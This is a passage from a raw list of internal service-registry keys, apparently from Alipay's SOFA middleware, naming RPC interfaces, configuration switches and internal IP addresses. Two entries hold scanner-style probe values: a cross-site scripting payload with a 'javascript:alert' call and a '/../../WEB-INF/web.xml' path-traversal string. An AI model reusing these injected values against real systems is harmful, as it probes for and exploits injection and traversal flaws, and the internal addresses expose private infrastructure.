NSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.railway.ClassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmDayuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.92.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.bp.engine.extension.BPDefineHandler:1.0:ideploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.inst.InstInfoInvoiceReceiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.riskrank.CustomerRiskRankService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.acappcore.biz.buildpack.internal.rest.TechstackInternalRest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeAppSignUpQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbmall.facade.coa.CoaMenuSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.appdeploy.api.DeployPackageOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.checker.ChargeCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.96.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linke.aci.core.facade.JobExecuteService:1.0:ironmanJobExecuteServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecocheck.common.service.DcAppServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.userpicture.UserPictureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.h5security.api.H5UrlPermissionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.use.InsMktProdPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_Finance_Test#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\" style=\"background:url(javascript:alert('antscan86842598-80102053-uniqueId-105003004'))\" \"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.merchantmember.facade.MemberForMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.antg.facade.accesstoken.AgATKIdentificationViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.condition.PromoConditionService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketClassificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.edeductcenter.common.service.facade.ldc.drm.LDCUidRangeResource.ldcUidRangeStr,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.commandcenter.commandcenterDataSource_OB_gc.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcmloanbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:custweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.aralert.ArAlertQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.PromoFastLoanBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.operation.InstanceOpsApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcriskmng_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IOperationRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.ucm.masterdata.InstContactQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.uem.common.service.facade.process.UEMProcessQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.AuthorizeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","csvoice@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.vega-integration-kepler:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mytradeprod.common.service.facade.InfoSecServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FinFundAppointmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.CodeRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SecureQuestionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.rate.RateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-basementurl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.PlatformReleaseDrmConfig.processUrlStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.chargefront_golden_ob_datasource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.auditprod.common.service.facade.test.MockHighCpu:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acnotifycore.common.service.facade.SPIExtensionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.manualUpdateStarWishOrderList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.facade.InvolvedResourceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:luckyBagExchangeExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.ProcessService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.RepayBatchOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmmbuss_hangHandleOutCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantContactService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.164.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zbdm.common.service.facade.biz.BizTaskExecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.DreamFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.marsyoung.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appfuse.common.service.facade.UniformLoadTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SETTLEMANAGER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_FFF#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:yuyan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftCrowdQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloancollection.common.service.facade.lawsuit.JointLawsuitServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.securityexplore.AeWelfareOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayAbilityDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.150.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finriskportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.voucherprod.facade.api.approval.VcpApprovalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CHARGEFRONT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cslearn.service.facade.api.CorpusFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:cif_gz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IZoneMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.253.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dchainprod.common.facade.query.CommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.shop.ShopOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:antsecurity_securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.artisan.facade.ArtisanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundprod.common.service.facade.test.TestTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.remedySetTairKeys,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.secdatacontext.common.facade.api.ComputationTripletService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.127.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cswork@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.common.api.GeneralRPCManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:imobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:infosec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_LOAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifecore.common.service.facade.lifecircle.LifeCircleOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.common.service.facade.apoint.service.AlipayPointBenefitExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpmetaportal.common.facade.api.DpBpmsCallbackApi:1.0:dataphin-dpmetaportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.topology.common.service.facade.api.subtopology.SubTopologyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.kbase.common.service.client.TreeQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:mabp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.phytable.ODPSPartitionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicadaq.paramrisk.common.service.facade.ParamRiskAnalysisQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenesas.common.service.facade.api.promo.ConsultationWaiterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.dispense.ServiceGroupExtension:1.0:internalDBServiceDispenseExtension@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lifemng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.fcbuservice.common.service.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.ThreadPoolConfig.maxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfcenter.common.service.facade.FundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeTrusteeshipManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoadprod.common.service.AdvertisementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.crowdsync.CrowdSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcprod.common.service.facade.CommunityPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:livetradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.234.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:cscenter-compensation-fundModifyCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.44.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.common.AssetItemConfigurationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferConfigManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilebill.common.service.api.search.BillListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_EXCHANGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.process.common.service.facade.ProcessInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paydecision.service.api.InstAbilityTimelinessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.application.AppManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_IDCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_FINORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.recommend.LifeServiceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.contract.facade.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_OVERSEAPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.distinguishprod.common.service.facade.ResOpenFacade:1.0:distinguishprod_open@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:airbops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.api.AccurateMatcherService:1.0:rmaccurateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_LINKE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ifundcontrolmodel.test.facade.TestBundleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.cloudKeyIndex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rcassetscenter.common.service.facade.api.RcLicenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:vendorcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_ARM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.oceanbase.obforumcore.service.activity.ActivityEnrolmentUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotmeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:picasso@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpproject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.coreQualityPlus.common.facade.service.api.NodeDataInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.poi.PoiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.degrade.DrmSalDegradeManager.globalDegradeEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.comment.LifeCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finriskmngcore.common.service.facade.InstQuotaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antprocess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveService:1.0:instasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.DepositModeCompatibleDrmResources.compatibleDepositModes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecquery.common.service.invest.DirectInvestInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.activity.InsLifeActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigOptService:1.0:scsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.livekit.LiveComponentActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.promo.LotteryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:penetrateOnchainSubmitTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.xview.conf.facade.XViewMetadataService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:kbopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_editReplenishmentOrderConfigCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.api.McardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:alideviceinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.company.CompanyInvestAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.PayOutApiSynchronizationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfusion.common.service.facade.contentfusion.TemplateHelperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.SignedServiceFacade:1.0:fccryptprod_boss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.instalment.facade.api.merchant.PromotionTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.cicada.facade.api.ActivityManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.53.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.workBenchSyncContent2CacheDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_PCINSTDATA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.InsttradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SyncManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sre.cloudpaychecker.facade.account.BillRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promoplaycenter.common.teamplay.facade.api.TeamPlayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@frboss#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.securityprodmng.common.service.facade.UctModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.dq.common.service.facade.dqctool.DqcRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucrcenter.service.facade.ZmUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthprod.facade.HealthPolicyModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.168.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ireserve.facade.api.AllocatePaymentChannelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bksmarttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.PropertyAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.topic.RealTimeMarketingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.changesdk.action.ChangeMessageListener:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/../../WEB-INF/web.xml@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantsettle.common.service.facade.payorderquery.api.MsPayOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:deptDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.grayprod.change.drm.ChangePolicy.openDataCollect,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfiprod.common.service.facade.p2p.asset.service.AssetDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppConfManager:1.0:i